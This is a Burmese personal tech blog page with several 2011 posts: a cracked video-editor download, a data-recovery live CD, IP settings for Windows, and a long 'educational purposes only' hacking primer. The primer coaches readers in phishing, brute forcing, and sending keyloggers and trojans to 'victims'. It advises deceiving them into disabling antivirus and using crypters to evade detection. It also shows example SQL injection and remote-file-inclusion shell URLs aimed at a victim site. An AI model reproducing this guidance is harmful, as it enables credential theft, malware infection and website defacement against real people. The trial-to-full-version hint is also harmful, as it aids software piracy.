welcome to Sawlinux, this is sharing the site of PC

Video Post

stat counters
Follow us on Twitter Subscribe to RSS Subscribe via Email

Sunday, September 4, 2011

Saw Linux  /  6:29 PM  /  ,   /  No comments
Video Edit လုပ်တဲ့နေရာမှာ Core Video Studio Pro X3 နဲ့လည်း အသုံးပြုရတာတော်တော်အဆင်ပြေတယ်။ စီဘောက်စ်မှာလိုချင်တဲ့ညီငယ်အတွက်ရော တစ်ခြားလိုအပ်သူအတွက်ပါတင်ပေးလိုက်တယ်။ ကျနော်ဒီဆိုက် မှာအရင်က Adobe Premiere 6.5 တစ်ခုတင်ထားခဲ့ပါပြီး လိုအပ်ရင် ဒီနေရာ မှာသွားရောက်ဒေါင်းလုဒ်ပါ။ Tutorial လုပ်ပုံလုပ်နည်းလေးပါတင်ထားပါတယ်။

အခု Core Video Studio Pro X3 ဆော့ဝဲကိုလိုအပ်မည့်သူတွေအတွက်ထပ်တင်ပေးလိုက်တယ်။ Trial Vers ion ကနေ Full Version ဖြစ်အောင်လုပ်လိုက်ရုံပါပဲ။ လုပ်တတ်မယ်လို့ထင်ပါတယ်။
Core Video Studio Pro X3 အတွက် Activate full version ပြုလုပ်နည်းလည်း ဒီနေရာမှာသွားရောက်ဖတ်လို့ရပါတယ်။

Download Software:
Core Video Studio Pro X3
Corel VideoStudio Pro

စောလင်းနက်စ်

Saturday, September 3, 2011

Saw Linux  /  3:37 AM  /    /  2 comments
ကျနော်ဂျီတော့ဖွင့်လိုက်ရင် (၁၇-၁၈) ၀န်းကျင်လောက်အရွယ်ရှိတဲ့ ညီငယ်လေးတွေ Hacking တွေ Hacker အကြောင်းတွေကိုပဲလာမေးနေကြတယ်။ သူတို့ထင်တာ ကျနော်ဒီဘလော့ဆိုက်ကိုတင်တတ်ရုံနဲ့ Hack တဲ့ processing တွေ လုပ်တတ်တယ်လို့ထင်ပုံရတယ်။ Hacker တစ်ယောက်ဖြစ်ချင်ရင် အရင်သိထား နားလည် ထားရမည့် အချက်တွေဟာ C++,C#,python,java,VB.NET,VB, DataStructure XML စတဲ့ programming language တွေပါပဲ။ု Webdevelopment ဖြစ်တဲ့ HTML / CSS, Javascript / AFAX အပိုင်းတွေကိုလည်း တီးမိခေါက်မိဖို့လိုပါတယ်။

ကျနော်က အဲဒါတွေကောင်းကောင်းတစ်ခုမှ ရေးတတ်တာမရှိလေတော့ Hacking, Hacker ဆိုတာ အဝေးကြီး လို့ပဲပြောရမယ်။ ဒါပေမယ့် ဘယ်နည်းပညာမဆို (Educational Purposes Only) ဆိုသည့်အတိုင်း ကျနော် အားတဲ့အချိန်တိုင်းမှာ တွေ့သမျှဆိုက်တွေမှာ ဖတ်တယ်၊ မှတ်တယ်၊ စုတယ်။ ဒါကျနော်လုပ်နေကျလုပ်ငန်းစဉ်

ပါပဲ။ သို့သော်အသက်မွေးဝမ်းကြောင်းပြုတဲ့နေရာမှာ programming language ရေးတတ်မှ ကွန်ပျူတာနယ် ပယ်မှာ ခြေဆန့်လို့ရတယ်ဆိုတာမျိုးတော့ ကျနော်လုံးဝလက်မခံပါ။ programming language ရေးတတ်လို့ ကွန်ပျူတာနယ်ပယ်မှာ ထိပ်တန်းနယ်ပယ်တစ်ချို့တွေမှာရပ်တည်နိုင်တယ်ဆိုတာကိုတော့ ကျနော်လက်ခံပါ တယ်။

ဒါဆို ကျနော်တို့ချဉ်းကပ်တဲ့ ဘယ်လိုကဏ္ဍမျိုးနဲ့အဓိကထားချဉ်းကပ်မလဲ၊ ဒါသိဖို့အရေးကြီးဆုံးပဲ။ ဥပမာ.Graphic Designer လား၊ Video Editing လား၊ Hardware, software computer maintenance အပိုင်းကိုလား တစ်ခု ခုကျွမ်းကျင်အောင်လေ့လာမယ်ဆိုရင် ကွန်ပျူတာလောကကို ကောင်းကောင်းခြေဆန့်လို့ရနိုင်ပါတယ်ဗျာ။ အေ

programming language အပိုင်းပါ ရေးတတ်၊ နားလည်တယ်ဆိုရင် အတိုင်းထက်အလွန်ပေါ့။

Hacker ဖြစ်ချင်တဲ့ ညီလေးတို့အားလုံးကို ပြောပါရစေ…အသက်အရွယ်အချိန်ကောင်းဆိုရင် hacker ဖြစ်ချင်ရင် programming language ကို အရင်လေ့လာသင်ယူသင့်တယ်လို့ကျနော်ထင်တယ်။

အခုဘယ်နည်းပညာမဆို (Educational Purposes Only) ဆိုသည့်အတိုင်း hacking အကြောင်းတွေကိုရေး လေ့ရှိတဲ့ ကျနော်မှတ်စုဆိုက်မှာ ယူပြီးပြန်လည်တင်ပြပေးလိုက်တယ်။

Hacking ကိုအမြဲမေးနေကြတဲ့ညီငယ်လေးတွေကို ဗဟုသုတရစေချင်တဲ့သဘောဖြစ်တယ်။ ကဲ..အောက်မှာ လေ့လာပြီး ဗဟုသုတရယူနိုင်ကြပါစေ…

အခြား အခြားသော forumတွေ၊ websiteတွေမှာ "Email ကို ကျနော်တို့ ဘယ်လို hack နိုင်သလဲ? ခင်ဗျားကျနော့်အတွက် hack ပေးနိုင်မလား ? ဆိုပြီး သန်းပေါင်းများစွာသောလူတွေ မေးနေကြတာကို သတိပြုမိကြမယ် ထင်ပါတယ်။ ဒီ့အတွက်ကြောင့် ဒီ post ဖြစ်လာရတာဖြစ်ပြီး သင့်အတွက် hacking နဲ့ ဆိုင်တဲ့ အခြေခံအတွေးအခေါ်လေးတွေကို ဖော်ပြထားမှာ ဖြစ်ပါတယ်။ ဒါတွေကို ဘယ်လိုဆင့်ပွားပြီး အသုံးချရမယ်ဆိုတာကတော့ သင် ကိုယ့်ကိုကိုယ် အားကိုးရပါလိမ့်မယ်။

နောက်ခံအခြေအနေ

Hack တဲ့ နည်းလမ်းတွေကို Windows 98 ဒီဇိုင်းပြုလုပ်ပြီးကတည်းက စတင်ခဲ့တာဖြစ်ပါတယ်။ Hacking ဆိုတာ အခြေခံအားဖြင့်တော့ ပျော့ကွက် ဟာကွက် ကွင်းဆက်တွေကို ရှာဖွေပြီး ၄င်းတို့ထဲကမှာ အချို့ယိုစိမ့်နိုင်တဲ့ holeတွေကနေ information တွေထွက်လာအောင် ကြိုးစားတာဖြစ်ပြီး သင့်အတွက် အရေးပါနိုင်တဲ့ Passwordများ၊ Credit Card နဲ့သက်ဆိုင်တဲ့ အသေးစိတ်အချက်အလက်များကို ရယူချင် ရယူနိုင်ပါတယ်။ တခါတရံမှာတော့ ပုဂ္ဂိုလ်ရေးဆိုင်ရာ တိုက်ခိုက်မှုတွေအတွက် အသုံးပြုကြပါတယ်။

သတိပြုရန်အကြောင်းအရာ

ကျနော် အကြံပေးချင်တာကတော့ ကောင်းမွန်တဲ့ Site တွေကနေ ဆောင်းပါးတွေ၊ ပို့ချချက်တွေကို သေချာဖတ်ရှုလေ့လာဖို့လိုပါတယ်။ ဒါဟာ သင့်အတွက် Hacking ကို လေ့လာခြင်းမှာ တစ်ခုတည်းသော နည်းလမ်းဖြစ်ပါတယ်။

မိတ်ဆက်

အဓိကကျတဲ့ အချက်တွေ ကိုပဲ ဖော်ပြပြီး hacking နည်းလမ်း အချို့ ကို အကျဉ်းချုပ် ဆွေးနွေးသွားမှာဖြစ်ပါတယ်။ Hacking မှာ အခြေခံအားဖြင့် အဓိကကျတဲ့ အပိုင်း နှစ်ပိုင်းအနေနဲ့ ကွဲထွက်နေပါတယ်။ အဲဒါကတော့...

၁။ Email (သို့) User information

၂။ Web based hacking တို့ပဲဖြစ်ပါတယ်။

Email (သို့) User information

ယနေ့အချိန်ကာလများမှာ အများဆုံးအသုံးပြုနေကျဖြစ်တဲ့ ၊ Email, Passwords, Credit Card details စတဲ့ user information များကို hack တဲ့အခါ ကျော်ကြားနေတဲ့ နည်းလမ်းတွေကတော့ အောက်ပါအတိုင်းဖြစ်ပါတယ်...

(က) Phishing

( ခ ) Brute Forcing

( ဂ ) Keylogging

(ဃ) Trojans

(က) Phishing

Phishing ဆိုတာကတော့ ပုံမှန်အားဖြင့် ထူးခြားတဲ့ တိုက်ခိုက်မှုတစ်ခုဖြစ်ပါတယ်။ hacker တွေက အချို့ website (သို့) gmail နဲ့ လုံးဝနီးပါးဆင်တူတဲ့ page တစ်ခုကို ဖန်တီးလိုက်ခြင်းဖြစ်ပါတယ်။ ဒီ page တွေကို hacker တွေက သူတို့ရဲ့ ကိုယ်ပိုင် server တွေမှာ upload လုပ်ကြပါတယ်။ အဲဒီနောက် user အသစ်တွေဆီကို အဲဒီ link တွေပေးပို့ပါတယ်။ user တွေက အဲဒီ link ကိုဖွင့်လိုက်တဲ့ အခါ user တွေ အနေနဲ့ သူတို့ ရောက်ချင်တဲ့ website (သို့) gmail လို့ထင်ပြီး သူတို့ရဲ့ username နဲ့ password တွေကို ရိုက်ထည့်ပြီး sign in (သို့) submit ကို click လိုက်ပြီဆိုရင်တော့ အဲဒီ user ရဲ့ information တွေကို hacker ကရရှိသွားပါပြီ။ ဒီနည်းလမ်းကို hacking လောကထဲကို ၀င်ရောက်ဖို့ကြိုးစားနေကြတဲ့ လူသစ်တွေ ကျယ်ကျယ်ပြန့်ပြန့်အသုံးပြုနေတဲ့ နည်းလမ်းတစ်ခုဖြစ်ပါတယ်။ ဒီနည်းလမ်းရဲ့ ပြုလုပ်ပုံအဆင့်ဆင့်ကို Simple Hacking ( Fake Login ပြုလုပ်ခြင်း) ဆိုတဲ့ post မှာဖော်ပြခဲ့ပြီးဖြစ်ပါတယ်။

ဒီနည်းလမ်းကို အသုံးပြုပြီး အိန္ဒိယမှာ ရှိတဲ့ ICICI bank နဲ့ပတ်သတ်ပြီး ဖြစ်ခဲ့တဲ့ သာဓက တစ်ခုရှိပါတယ်။ များစွာသော user info တွေကို ဒီနည်းလမ်းကို အသုံးပြုပြီး အခိုးခံခဲ့ရတာဖြစ်ပါတယ်။

အားနည်းချက် :

လူတော်တော်များများက ဒီနည်းလမ်းကို အသုံးပြုဖို့ကြိုးစားနေဆဲဖြစ်ပါတယ်။ ဒါပေမယ့် ဒီနည်းလမ်းမှာ အားနည်းချက်တစ်ခုရှိနေပါတယ် အဲဒါကတော့ သားကောင်ဟာ internet နဲ့ပတ်သတ်ပြီး ဗဟုသုတ အနည်းငယ်ရှိရုံနဲ့ ဒီ page ဟာ အစစ်မဟုတ်မှန်းသိနိုင်ပါတယ်... ဘာကြောင့်လဲဆိုတော့ သူက URL ကို ဖတ်ကြည့်မယ် ဒါဆိုရင် မူရင်း website မဟုတ်ဘူးဆိုတာကို နားလည်သွားနိုင်ပါတယ်။

( ခ ) Brute Forcing

Brute Forcer ဆိုတာကတော့ အခြေခံအားဖြင့် cracker လို့ခေါ်ဆိုနိုင်တဲ့ program တစ်ခုဖြစ်ပါတယ်။ အဲဒီ Brute Forcer ထဲမှာသင်က သင် hack ချင်တဲ့ username ကို ထည့်သွင်းရပါမယ်...ပြီးတော့ notepad file တစ်ခုကိုလည်း password တစ်ခုကဲ့သို့ထည့်သွင်းရမှာဖြစ်ပြီး အဲဒီ notepad ထဲမှာ ရှိသမျှ အားလုံးနီးပါး အင်္ဂလိပ်ဘာသာစာလုံးတွေ ပါရှိရမှာဖြစ်ပါတယ်။ ၄င်းက ဘယ်လိုအလုပ်လုပ်သလဲဆိုတော့ password မှာပါတဲ့ စာလုံးတစ်လုံးစီတိုင်းအတွက် notepad file ထဲမှာ ရှိသမျှ စာလုံးတိုင်းနဲ့ တိုက်ကြည့်ပါတယ်။ အားလုံးတူညီသွားပြီ ဆိုရင်တော့ ပွဲသိမ်းပဲပေါ့...။ တခြား forum တွေမှာ " huge pass list" ဆိုတဲ့ ခေါင်းစဉ်ကို သတိပြုမိချင်ပြုမိပါလိမ့်မယ်။ ၄င်းတို့က ဘာမှတော့မဟုတ်ပါဘူး...ဒါပေမယ့် သင့်ရဲ့ bruteforcer ထဲကို ထည့်သွင်းဖို့ password list ဖြစ်ပါတယ်။

အားနည်းချက် :

၁။ တခါတရံမှာ brute forcing ဟာ အချိန်အလွန်ကြာမြင့်တတ်ပါတယ်။

၂။ ၄င်းဟာ အာမခံချက် မရှိပါဘူး

၃။ ယနေ့အချိန်ကာလမှာဆိုရင် လူတော်တော်များများဟာ alpha-numeric-symbol password တွေရှိနေကြပါပြီ။ bruteforcer အတွက် ၄င်းတို့က detect လုပ်ဖို့ အလွန်ခက်ခဲပါတယ်။

၎။ ကျော်ကြားတဲ့ gmail ကဲ့သို့သော site တွေမှာ ပြုလုပ်ထားတဲ့ ဒီဇိုင်းတစ်ခုကတော့ loginုလုပ်တဲ့အခါ ၃ ခါထက်ကျော်ပြီး မှားယွင်းနေပြီးဆိုရင် ၄င်းတို့ က "image captcha" ကိုထည့်လိုက်တဲ့အတွက် bruteforcer ကို ရပ်သွားစေပါတယ်။

( ဂ ) Keylogging

Keylogger ကတော့ "server" လို့ ခေါ်ဆိုနိုင်တဲ့ file သေးသေးလေးတွေကို ဖန်တီးဖို့အတွက် သင့်ကို ကူညီပေးပါလိမ့်မယ်။ သင်က သင့်ရဲ့ server ကို သားကောင် ဆီသို့ ပေးပို့ရမှာဖြစ်ပါတယ်။ သင့်ရဲ့ သားကောင်က အဲဒီအပေါ်မှာ click လိုက်ရင်တော့ ကိစ္စပြီး ပါပြီ။

ဒီနည်းလမ်းဟာ တစ်စုံတစ်ယောက်ကို hack ဖို့အတွက် အကောင်းဆုံးနည်းလမ်းတစ်ခု ဖြစ်နိုင်ပါတယ်။ Keylogger ဆိုတာကတော့ သင့်သားကောင်ရဲ့ computer ထဲမှာ သူဟာသူ install လုပ်နိုင်တဲ့ program တစ်ခုဖြစ်ပြီး သင့်သားကောင်က သူ့ရဲ့ keyboard ပေါ်မှာ ရိုက်လိုက်သမျှ keystrokeတိုင်းကို မှတ်တမ်းတင်ထားပါတယ်။ ပြီးရင် ၄င်းက မှတ်တမ်းတင်လို့ ရသမျှတွေကို hacker ဆီသို့ပေးပို့ပါတယ်။ keystroke ( ဆိုလိုတာက FTP, Email , Messengers ) ကို လက်ခံရရှိဖို့ အများကြီးလမ်းရှိပါတယ်။ ကျနော့်အနေနဲ့ပြောရရင် ဒီနည်းလမ်းဟာ သင့်ရဲ့ သားကောင်ကို လှည့်စားပြီး သူတို့ရဲ့ information တွေကို ရယူဖို့အတွက် အကောင်းဆုံးနည်းလမ်းတစ်ခုဖြစ်ပါတယ်။ ( Keylogger Collection )

အားနည်းချက် :

၁။ သင့်ရဲ့ သားကောင်က keylogger ကိုလက်ခံရရှိတဲ့ အခါ သူတို့ရဲ့ antivirus တွေက keylogger ကို အလိုအလျှောက် delete လုပ်လိုက်ခြင်းဖြစ်ပါတယ်။ ဒါကြောင့် သင်အနေနဲ့ တစ်စုံတစ်ရာ လှည့်ဖြားခြင်းအားဖြင့် antivirus ကို disable လုပ်ဖို့ စည်းရုံးသိမ်းသွင်းရမှာ ဖြစ်ပါတယ်။

၂။ တခါတရံမှာ keylogတွေကို ပေးပို့နေတဲ့အချိန်မှာ firewall က block လုပ်လိုက်ခြင်းများပဲ ဖြစ်ပါတယ်။

အကြံပြုချက် - ကျနော်အကြံပေးလိုတာကတော့ "crypters" လို့ခေါ်တဲ့ program တွေကို အသုံးပြုဖို့ပါပဲ။ ၄င်းတို့က သင့်ရဲ့ server တွေကို ရှာဖွေမတွေ့ပဲ ပြုလုပ်နိုင်စေဖို့ကူညီပေးပါလိမ့်မယ်။ ဒါဆိုရင် သင့်သားကောင်ရဲ့ anti-virus တွေက ၄င်းတို့ကို detect မလုပ်နိုင်တော့ပါဘူး။ Anti-Virus နဲ့ တူတူပုန်းတမ်းကစားကြမယ် ဆိုတဲ့ post မှာ Crypter တွေကို တင်ပေးထားခဲ့ပြီး ဖြစ်ပါတယ်။

(ဃ) Trojans

Trojan တွေကတော့ keyloggerတွေရဲ့ ဖခင် နဲ့တူပါတယ်။ Trojan တွေက အပေါ်မှာ ဖော်ပြခဲ့တဲ့ keylogger တွေအတိုင်းပဲ သင့်ဆီကို keylog တွေ ပေးပို့ပါတယ်။ ဒါ့အပြင် ၄င်းတို့က သင့်သားကောင်းရဲ့ computer ကို သင် ထိန်းချုပ်မှု ရစေပါတယ်။ သင့်သားကောင်ရဲ့ computer မှာ သင့်စိတ်ကြိုက် fileတွေကို Edit / delete/ upload/ download လုပ်နိုင်ပါတယ်။ Trojan တွေမှာ keyboard ကို ကောင်းကောင်း အလုပ်မလုပ်အောင် ( keyboard မှာ ကိုယ်နှိပ်လိုက်တဲ့ စာလုံးက တစ်ခု ပေါ်နေတာက တစ်ခု ပေါ်ချင်တဲ့ စာလုံးလျှောက်ပေါ်နေတာ၊ တခါတလေ keys တွေကို ရိုက်လို့ရတဲ့ အခါ ရတယ် မရတဲ့ အခါလည်း မရဘူး အဲလိုမျိုးတွေပေါ့ )၊ CD ROM တွေ Eject လုပ်တဲ့ အခါ ထွက်မလာတာ ၊ CD ပြန်ထည့်ပေးဖို့အတွက် တောင်းဆိုတာ စသဖြင့် အခြား အခြားသော feature တွေလည်း ပါဝင်ပါသေးတယ်။ ( Trojan Toolများ )

အားနည်းချက် :

keylogger တွေနဲ့ အတူတူပါပဲ။

အကြံပြုချက် - keylogger မှာ အကြုံပြုခဲ့သလိုပါပဲ crypter တွေသုံးပါ။

Web Hacking

ကျနော်က ဘယ် website မဆို hack ဖို့အတွက် hacker တွေကို အကူအညီပေးနိုင်တဲ့ အသုံးပြုမှုအများဆုံးဖြစ်တဲ့ web hacking နည်းပညာ အချို့ ကို ဆွေးနွေးပေးသွားပါမယ်။ တဘက်ကကြည့်ရင်လည်း ဒါဟာ သင် site ကို ကာကွယ်ဖို့အတွက် ကူညီပါလိမ့်မယ်။

(က)SQL Injection

( ခ ) XSS

( ဂ) Shells

(ဃ) RFI

( င ) နောက်ထပ်အများကြီး ရှိပါသေးတယ်။ ဒါပေမယ့် ဒီမှာတော့ အသုံးပြုမှုအများဆုံးဖြစ်တာကိုပဲ ဆွေးနွေးသွားမှာ ဖြစ်ပါတယ်။

(က) SQL Injection

ယနေ့အချိန်အခါမှာ website အများစုဟာ SQL Database တစ်ခုနဲ့ connect လုပ်ထားကြပါတယ်။ SQL Databaseက သူတို့ရဲ့ website သို့ လာရောက်လာပတ်သူက register လုပ်သွားတဲ့အခါ username နဲ့ password တွေ ( encrypt လုပ်ပြီး )ကို သိမ်းဆည်းထားဖို့အတွက် သူတို့ကို ကူညီပါတယ်။ SQL database က user တစ်ယောက် logs in လုပ်တဲ့ အခါတိုင်းမှာ မေးခွန်းတွေမေးမြန်းတဲ့ အလုပ်ငန်းစဉ်ကို လုပ်ဆောင်ပါတယ်။ ၄င်းတို့ database ဆီသွားပြီး မှန်ကန်သေချာတဲ့ password ဟုတ်မဟုတ် ကြည့်ပါတယ်။ အကယ်၍ မှန်ကန်တယ်ဆိုရင်တော့ user ကို log in လိုက်ပါတယ်၊ မမှန်ဘူးဆိုရင်တော့ error တစ်ခုကို ပေးပါလိမ့်မယ်။ ဒါကြောင့် အခြေခံဆောင်ရွက်ချက်ကတော့ database မှာရှိတဲ့ internet information ကို အသုံးချဖို့ကြိုးစားပြီး database ထဲမှာရှိတဲ့ database ထဲမှာ မေးခွန်းတစ်ခုကို စစ်ဆေးဖို့ command တစ်ခုကို လိုက်နာဆောင်ရွက်နေခြင်းဖြစ်ပါတယ်။ ဒီနည်းလမ်းနဲ့ ပတ်သတ်ပြီး ဒီ post ထဲမှာ ထည့်သွင့်ဖို့ဆိုတာ တကယ့်ကို မဖြစ်နိုင်ပါဘူး။ ဘာကြောင့်လဲဆိုတော့ ဒီနည်းလမ်းဟာ website ကို hack ဖို့အတွက် နည်းလမ်းတွေထဲမှာ အရှုပ်ထွေး အခက်ခဲဆုံးနည်းလမ်းတစ်ခု ဖြစ်လို့ပါ။

သင့်ရဲ့ website မှာ RFI attach လုပ်ဖို့ အားနည်းချက်ရှိလား မရှိလားဆိုတာကို သိချင်ရင် အောက်ပါအတိုင်းပြုလုပ်ပါ...

အကယ်၍ သင့် site ရဲ့ URL က....

yoursite.com/index.php?id=545

ဖြစ်နေတယ်ဆိုရင် ၄င်းရဲ့ အဆုံးမှာ ( ' ) ကို အောက်မှာ ပြထားသလိုမျိုး ပေါင်းထည့်ပေးပါ...

yoursite.com/index.php?id=545'

( ခ ) XSS

XSS ကတော့ အချို့ website တွေကို hack ဖို့အတွက် ကောင်းမွန်တဲ့ အခြားနည်းလမ်းတစ်ခုလို့ ဆိုနိုင်ပါတယ်။ အချို့ website/ forum တွေက post ( သို့ ) ဆောင်းပါး တွေထဲမှာ HTML ခွင့်ပြုခဲ့မယ်ဆိုရင် hacker က content ထဲကို အန္တရာယ်ရှိတဲ့ script တွေကို post လုပ်နိုင်ပါတယ်။ ဒါကြောင့် ဘယ်အချိန်မဆို user တစ်ယောက်က page ကိုဖွင့်လိုက်တိုင်း cookieတွေက hacker ဆီကိုပေးပို့ပါလိမ့်မယ်။ ဒီအတွက် သူက user ကဲ့သို့ log in လုပ်နိုင်ပြီး website ကို #$%@# လုပ်ပါတော့တယ်။

( ဂ ) Shells

Shell ဆိုတာကတော့ အန္တရာယ်ရှိတဲ့ .php script ဖြစ်ပါတယ်။ ၄င်းကိုဘယ်လိုလုပ်ရမလဲ ဆိုတော့ avaters, recepie, tricks , feedbacks ကဲ့သို့သော ဘယ်ဖိုင်မဆို upload လုပ်နိုင်တဲ့ website တစ်ခုခုမှာ နေရာ တစ်ခု ရှာပါ။ ပြီးရင် သင့်ရဲ့ shell file ကို အဲဒီထဲကို upload လုပ်နိုင်ဖို့ကြိုးစားပါ။ upload ပြီးသွားရင် ၄င်းကို URL bar မှာဖွင့်ပါ။ အဲဒီ webhosting ရဲ့ FTP account တစ်ခုလုံးကို သင် မြင်ရပါလိမ့်မယ်။ index page ထဲမှာပါဝင်သမျှကို သင့်စိတ်ကြိုက် rename/Edit/upload/download ကြိုက်သလိုလုပ်လို့ရပါပြီ။ အခုလိုပြုလုပ်ခြင်းကို deface လို့လည်း ခေါ်ပါတယ်။

(ဃ) RFI

RFI ကလည်း website တစ်ခုကို deface လုပ်ဖို့အတွက် ကောင်းတဲ့နည်းလမ်းတစ်ခုပဲ ဖြစ်ပါတယ်။ ၄င်းကို shell နဲ့အတူအသုံးပြုရမှာ ဖြစ်ပါတယ်။ ၄င်းကို သင့်ရဲ့ shell ပေါ်မှာ upload လုပ်ပြီးပြီး ဆိုရင် သင့်ကိုအထောက်အကူပေးပါလိမ့်မယ်...

yoursite.com/shell.txt

သင်က RFT သို့ အားနည်းချက်ရှိတဲ့ site တစ်ခုကို ရှာတွေ့ရပါမယ်... အဲဒီနောက် အောက်မှာပြထားတဲ့ အတိုင်း ပြုလုပ်နိုင်ပါတယ်...

victimssite.com/index.php?page=yousite.com/shell.txt

ဒီဟာက သင့်ကို သင့်သားကောင်ရဲ့ sites FTP ၀င်လမ်း ကို ထပ်ပေးပါလိမ့်မယ်။ shell မှာလိုပဲ သင်ကြိုက်သလို သင့်စိတ်ကြိုက် လုပ်လို့ရပါပြီ။

အကယ်၍ သင်က သင့် website က RFI attach လုပ်ဖို့ အားနည်းချက် ရှိလား မရှိဘူးလားဆိုတာကို စစ်ဆေးချင်ရင် အောက်ပါအတိုင်း လုပ်ပါ...

အကယ်၍ သင့် site ရဲ့ URL က

yoursite.com/index.php?id=545

ဖြစ်နေခဲ့ရင် ၄င်းရဲ့ အဆုံးမှာ အောက်မှာပြထားတဲ့ အတိုင်း ပေါင်းထည့်ပေးပါ...

yoursite.com/index.php?id=http://www.google.com

အကယ်၍ သင့် page ထဲမှာ google page ပါဝင်နေမယ်ဆိုရင်တော့ အဲဒီအဓိပ္ပာယ်က RFI သို့ တွဲဆက်ခြင်းမှာ ပျော့ကွက်တစ်ခုဖြစ်ပါတယ်။

(Educational Purposes Only)

Friday, September 2, 2011

Saw Linux  /  11:10 PM  /  ,   /  No comments
အကြောင်းတစ်စုံတစ်ခုကြောင့် မိမိကွန်ပျူတာဟာ Window Boot မတက်နိုင်တော့ဘူးရင် Window အသစ် ပြန်တင်ရဖို့များတယ်။ အဲဒီအခါ မိမိအရေးတကြီးသိမ်းထားတဲ့ Data စသည်တွေကို Window Directory ရှိ တဲ့နေရာမှာ သိမ်းထားမိရင် ပြန်ရဖို့တော်တော်ခက်လိမ့်မည်။ ကျန်တဲ့ Drive တွေမှာ ပြန်ယူလို့ရကောင်းရနိုင် ပါတယ်။ ဒါလဲ Linux Live CD နဲ့ ပြန်ယူလို့ရနိုင်တယ်။ သို့သော် Linux Live CD က MB site နည်းနည်းကြီး တာရယ်။ ၀င်ထွက်ရတာနည်းနည်းခက်တာရယ်ကြောင့် ဒီဆော့ဝဲနဲ့ Data တွေကို ပြန်ယူဖို့ညွန်းရတာဖြစ်တယ်။
ဒီလိုပြသနာမျိုးကြုံလာရင် ၀င်းဒိုးပြန်မတင်ခင် ဒီ Redo Backup Recovery (iso. Image) နဲ့ အရင်ဖြေရှင်း စေချင်တယ်။ Boot တက်တဲ့နေရာမှာလည်း ၀င်းဒိုးတင်တတ်သူတွေအတွက်အထူးပြောစရာမလိုတော့ပါ။ ပြောရမယ်ဆိုရမယ်ဆိုရင် ဒီဆော့ဝဲလေးဟာ Live CD ပါပဲ။

ဒီဆော့ဝဲလေးကို CD နှင့် ဖြစ်ဖြစ် Stick နှင့် ဖြစ်ဖြစ် ဆောင်ထားရင် လိုအပ်တဲ့အခါ အချိန် ၁၀ မိနစ်အတွင်းအ ရေးကြီးတဲ့ data တွေကို လုံခြုံစိတ်ချရတဲ့ နေရာမှာ Backup လုပ်ပြီးသား ဖြစ်မှာပါ။ Windows OS ဖြစ်ဖြစ် Linux OS ဖြစ်ဖြစ၊် ဘယ် OS နှင့်ပဲ ဖြစ်ဖြစ် သုံးလို့ရတယ် ပြီးတော့ GPL လိုင်စင်နှင့် ထုတ်ထားတာ ဖြစ်တဲ့အ တွက်ကြောင့် ကိုယ်ပိုင်ပဲ သုံးသုံး၊ လုပ်ငန်းမှာ အခကြေးငွေ ယူပြီးတော့ပဲ သုံးသုံး တရားဝင် software ဖြစ် တယ်။

ကွန်ပျူတာကို Network ချိတ်လို့ရသလို CD နှင့် USB လည်း ထည့်လို့ရတယ်။ Internet ပါ သုံးလို့ရတယ် ဖျက်ပြီးသား ဖိုင်တွေကို ပြန်ကြည့်လို့ရသလို ပြန်ကူးထားလို့ရတယ်။ နောက်ဆုံး ဒီဆော့ဝဲဟာ ၀င်းဒိုးပွင့်မ လာတဲ့စက်တွေမှာ အရေးတကြီး Recovery လုပ်နိုင်တဲ့ဆော့ဝဲလေးပါလို့မသိသေးသောဘော်ဘော်တွေ မိတ်ဆက်ပေးလိုက်တယ်။

Download Redo Backup and Recovery Live CD:
Redo Backup and Recovery

Wednesday, August 31, 2011

Saw Linux  /  6:42 PM  /    /  No comments
အချို့ Internet အသုံးပြုတဲ့ Router များသည် Obtain an IP address automatically တပ်ဆင်ထားတာရှိ သလို IP address နဲ့လည်းခံထားတာရှိတယ်။ IP address တပ်ဆင်ထားတဲ့ Router တွေကို အသုံးပြုတဲ့အခါ IP number တွေချိန်းပေးရပါတယ်။ IP number ကိုချိန်းပေးပြီးမှ မိမိကွန်ပျူတာကို အင်တာနက် connection ၀င်မှာဖြစ်ပါတယ်။ အဲဒါတွေမချိန်းတတ်သူတွေအတွက်ဒီပို့စ်ကအကူအညီဖြစ်စေနိုင်ပါလိမ့် မယ်။

အခုတော့ window ၂ခု လုံးအတွက်ပြောပြပေးမယ်...အိုင်ပီ ချိန်းတဲ့နည်းတွေက တယောက်နဲ့တယောက် မတု ကြဘူး...ခအခုပြောမဲ့နည်းကလဲ အများစု သုံးနေကျတဲ့နည်းလေးပါ..

For window xp

:::::::::::::::::

Run box ကိုဖွင့်လိုက်ပါ...ပြီးရင် ncpa.cpl ကိုရိုက်၊network ထဲေ၇ာက်သွားလိမ့်မယ်.. အဲမှာ Local Area

Network ဆိုတာရှိတယ်..ပြီးရင်အဲဒါကို Rightclick နှိပ်..Properties ထဲသွား general ထဲကို ရောက်နေ

လိမ့်မယ်...အဲဒီမှာ အမှန်ခြစ်ထားတဲ့ဘာညာဘာညာ 4 ခုရှိလိမ့်မယ်..အဲဒီ 4ခုထဲက အောက်ဆုံးမှာ Internet protocol (TCP/IP) ကို ရွေး၊ ပြီးရင် install and properties ရှိတယ်..properties ကိုနှိပ်လိုက် IP setting

ထဲရောက်ပါပြီခင်ဗျာ... IP မပေးထားရင် Obtain an IP address automatically ဖြစ်နေလိမ့်မယ်... IP အသစ်ပေးချင်ရင်ပဲဖြစ်ဖြစ် ချိန်းချင်ရင်ပဲဖြစ်ဖြစ်ဆိုရင်..Use the following Ip address ကိုရွေးပြီး IP အသစ် တို့ ချိန်းချင်တာတို့ထည့်လိုက်ပေါ့...ဒါလေးပါပဲ..IP number တွေကတော့ တယောက်နဲ့တယောက်ပေးတာမ တူညီကြလို့ မပြောတော့ဘူးနော်...

For window7

:::::::::::::::::

အင်း XP နဲ့ 7ကနည်းနည်းလေးပဲကွဲတာပါ..ကွဲတဲ့အချက်လေးတွေပဲပြောတော့မယ်နော်..Local Area Network ဆိုတာရှိတယ်..ပြီးရင်အဲဒါကို Rightclick နှိပ်..Properties ထဲသွား general ထဲကို ရောက်နေလိမ့်မယ်...အဲဒီမှာ အမှန်ခြစ်ထားတဲ့ဘာညာဘာညာ ၇ခုလောက်ရှိလိမ့်မယ်...Xp မှာ Internet protocol (TCP/IP)တစ်ခုပဲရှိတယ်..

